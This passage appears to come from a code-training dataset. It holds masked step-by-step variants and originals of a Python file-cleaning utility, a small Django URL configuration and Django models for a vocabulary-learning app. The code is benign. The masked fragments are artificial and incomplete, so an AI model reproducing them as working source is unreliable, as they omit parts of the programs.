'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace('\\\\', '/')\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-3": "<mask token>\n\n\ndef clean_exts(folder='.', fLOG=print, exts=None, fclean=None):\n \"\"\"\n Cleans files in a folder and subfolders with a given extensions.\n\n @param folder folder to clean\n @param fLOG logging function\n @param exts extensions to clean\n @param fclean if not None, ``fclean(name) -> True`` to clean\n @return list of removed files\n\n If *exts* is None, it will be replaced by\n ``{\".pyd\", \".so\", \".o\", \".def\", \".obj\"}``.\n \"\"\"\n if exts is None:\n exts = {'.pyd', '.so', '.o', '.def', '.obj'}\n rem = []\n for root, _, files in os.walk(folder):\n for f in files:\n ext = os.path.splitext(f)[-1]\n if (ext in exts and 'exe.win' not in root and 'site-packages'\n not in root and '_venv' not in root):\n filename = os.path.join(root, f)\n if fclean is not None and not fclean(filename):\n continue\n fLOG('[clean_exts] removing ', filename)\n os.remove(filename)\n rem.append(filename)\n return rem\n\n\ndef clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=\n '.*[.]git/.*', op='CR', fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n\n def clean_file_cr(name):\n with open(name, 'rb') as f:\n content = f.read()\n new_content = content.replace(b'\\r\\n', b'\\n')\n if new_content != content:\n with open(name, 'wb') as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, 'rb') as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, 'wb') as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace('\\\\', '/')\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport os\nimport re\n\n\ndef clean_exts(folder='.', fLOG=print, exts=None, fclean=None):\n \"\"\"\n Cleans files in a folder and subfolders with a given extensions.\n\n @param folder folder to clean\n @param fLOG logging function\n @param exts extensions to clean\n @param fclean if not None, ``fclean(name) -> True`` to clean\n @return list of removed files\n\n If *exts* is None, it will be replaced by\n ``{\".pyd\", \".so\", \".o\", \".def\", \".obj\"}``.\n \"\"\"\n if exts is None:\n exts = {'.pyd', '.so', '.o', '.def', '.obj'}\n rem = []\n for root, _, files in os.walk(folder):\n for f in files:\n ext = os.path.splitext(f)[-1]\n if (ext in exts and 'exe.win' not in root and 'site-packages'\n not in root and '_venv' not in root):\n filename = os.path.join(root, f)\n if fclean is not None and not fclean(filename):\n continue\n fLOG('[clean_exts] removing ', filename)\n os.remove(filename)\n rem.append(filename)\n return rem\n\n\ndef clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=\n '.*[.]git/.*', op='CR', fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n\n def clean_file_cr(name):\n with open(name, 'rb') as f:\n content = f.read()\n new_content = content.replace(b'\\r\\n', b'\\n')\n if new_content != content:\n with open(name, 'wb') as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, 'rb') as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, 'wb') as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace('\\\\', '/')\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-5": "\"\"\"\n@file\n@brief Various function to clean files.\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport re\n\n\ndef clean_exts(folder=\".\", fLOG=print, exts=None, fclean=None):\n \"\"\"\n Cleans files in a folder and subfolders with a given extensions.\n\n @param folder folder to clean\n @param fLOG logging function\n @param exts extensions to clean\n @param fclean if not None, ``fclean(name) -> True`` to clean\n @return list of removed files\n\n If *exts* is None, it will be replaced by\n ``{\".pyd\", \".so\", \".o\", \".def\", \".obj\"}``.\n \"\"\"\n if exts is None:\n exts = {\".pyd\", \".so\", \".o\", \".def\", \".obj\"}\n rem = []\n for root, _, files in os.walk(folder):\n for f in files:\n ext = os.path.splitext(f)[-1]\n if (ext in exts and \"exe.win\" not in root and \"site-packages\" not in root and\n \"_venv\" not in root): # pragma: no cover\n filename = os.path.join(root, f)\n if fclean is not None and not fclean(filename):\n continue\n fLOG(\"[clean_exts] removing \", filename)\n os.remove(filename)\n rem.append(filename)\n return rem\n\n\ndef clean_files(folder=\".\", posreg='.*[.]((py)|(rst))$',\n negreg=\".*[.]git/.*\", op=\"CR\", fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n def clean_file_cr(name):\n with open(name, \"rb\") as f:\n content = f.read()\n new_content = content.replace(b\"\\r\\n\", b\"\\n\")\n if new_content != content:\n with open(name, \"wb\") as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, \"rb\") as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, \"wb\") as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace(\"\\\\\", \"/\")\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.conf.urls import url
from tree import views
urlpatterns = [
url('/home', views.home),
url('/about', views.about),
]
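
A hedged sketch of how this URLconf could be included from a project's root urls.py; note that Django's url() treats its first argument as a regular expression matched against the path without a leading slash, so anchored patterns such as r'^home$' are the more conventional form. The project layout and the "tree/" prefix below are assumptions.

# Hypothetical root URLconf wiring for the routes defined above.
from django.conf.urls import include, url

urlpatterns = [
    url(r'^tree/', include('tree.urls')),
]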
|
normal
|
{
"blob_id": "3313f01ed98433f4b150c4d8e877ac09eb8403b4",
"index": 5652,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('/home', views.home), url('/about', views.about)]\n",
"step-3": "from django.conf.urls import url\nfrom tree import views\nurlpatterns = [url('/home', views.home), url('/about', views.about)]\n",
"step-4": "\nfrom django.conf.urls import url\nfrom tree import views\n\nurlpatterns = [\n url('/home', views.home),\n url('/about', views.about),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Meaning(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
        verbose_name='forvo id предпочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Meaning(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
value = models.TextField(verbose_name='Значение')
order = models.PositiveIntegerField(verbose_name='Порядок', default=0)
examples = JSONField(null=True, blank=True)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
        verbose_name='forvo id предпочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Word(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
ordering = ['value']
verbose_name = 'Слово'
verbose_name_plural = 'Слова'
class Meaning(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
value = models.TextField(verbose_name='Значение')
order = models.PositiveIntegerField(verbose_name='Порядок', default=0)
examples = JSONField(null=True, blank=True)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
        verbose_name='forvo id предпочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Word(models.Model):
value = models.CharField(max_length=50, verbose_name='Слово')
spelling = models.CharField(max_length=250, verbose_name='Транскрипция')
raw_od_article = JSONField(verbose_name='Сырые данные с OD')
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return self.value
class Meta:
ordering = ['value']
verbose_name = 'Слово'
verbose_name_plural = 'Слова'
class Meaning(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
value = models.TextField(verbose_name='Значение')
order = models.PositiveIntegerField(verbose_name='Порядок', default=0)
examples = JSONField(null=True, blank=True)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
        verbose_name='forvo id предпочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
import json
import os
from django.conf import settings
from django.db import models
from jsonfield import JSONField
class Word(models.Model):
value = models.CharField(
max_length=50,
verbose_name='Слово'
)
spelling = models.CharField(
max_length=250,
verbose_name='Транскрипция'
)
raw_od_article = JSONField(
verbose_name='Сырые данные с OD'
)
is_active = models.BooleanField(
default=True,
verbose_name='Используется'
)
def __str__(self):
return self.value
class Meta:
ordering = ["value"]
verbose_name = "Слово"
verbose_name_plural = "Слова"
class Meaning(models.Model):
word = models.ForeignKey(
Word,
on_delete=models.CASCADE,
verbose_name='Слово'
)
value = models.TextField(
verbose_name='Значение'
)
order = models.PositiveIntegerField(
verbose_name="Порядок",
default=0
)
examples = JSONField(
null=True,
blank=True
)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ["order"]
verbose_name = "Доп. значение"
verbose_name_plural = "Доп. значения"
class Pronunciation(models.Model):
word = models.ForeignKey(
Word,
on_delete=models.CASCADE,
verbose_name='Слово'
)
audio = models.FileField(
upload_to='media/audio',
verbose_name='Произношение'
)
raw_od_data = JSONField(
verbose_name='Сырые данные с OD',
blank=True,
null=True
)
is_active = models.BooleanField(
default=True,
verbose_name='Используется'
)
def __str__(self):
return "Произношение {}".format(self.word)
class Meta:
verbose_name = "Произношение"
verbose_name_plural = "Произношения"
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(
Word,
on_delete=models.CASCADE,
verbose_name='Слово'
)
user = models.ForeignKey(
"auth.User",
on_delete=models.CASCADE,
verbose_name='Пользователь'
)
is_user_know_meaning = models.BooleanField(
default=False,
verbose_name='Выучил значение'
)
is_user_know_pronunciation = models.BooleanField(
default=False,
verbose_name='Выучил произношение'
)
usage_count = models.PositiveIntegerField(
default=0,
verbose_name='Количество показов'
)
last_usage_date = models.DateTimeField(
auto_now_add=True,
verbose_name='Дата последнего показа'
)
preferred_pronunciation = models.PositiveIntegerField(
default=0,
        verbose_name='forvo id предпочтительного произношения',
)
training_session = models.BooleanField(
default=False,
blank=False,
verbose_name='Сеанс обучения'
)
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(
settings.BASE_DIR, 'media', 'forvo', '{}.json'.format(word_str)
)
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds', word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds', word_str, item))
return ret
    def get_pronunciations(self):
        # Merge the cached forvo metadata for this word with the locally stored
        # mp3 files and return at most four US-English pronunciations.
        word = self.word
        forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in forvo_meta.get('items') or []:
if item.get('code', '') != 'en' or item.get(
'country', '') != 'United States':
continue
if ct > slen-1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({
'id': item['id'],
'by': item['username'],
'sex': item['sex'],
'src': sound_file,
'best': is_best
})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return "Статистика слова {}".format(self.word)
class Meta:
verbose_name = "Статистика"
verbose_name_plural = "Статистика"
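
A minimal, hypothetical sketch of how the pronunciation lookup above is typically driven. The user and word objects are placeholders, and the expected shape of the cached forvo JSON (an "items" list whose entries carry "id", "code", "country", "username" and "sex") is inferred from the code rather than taken from real data.

# Hypothetical usage: fetch or create the learning state for a user/word pair
# and collect up to four US-English pronunciations for display.
state, _ = WordLearningState.objects.get_or_create(user=some_user, word=some_word)
for p in state.get_pronunciations():
    # each entry holds the forvo id, speaker name and sex, the local mp3 URL
    # and a 'best' flag marking the preferred recording
    print(p['id'], p['by'], p['sex'], p['src'], p['best'])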
|
flexible
|
{
"blob_id": "067e0129b1a9084bbcee28d1973504299b89afdb",
"index": 8911,
"step-1": "<mask token>\n\n\nclass Meaning(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = 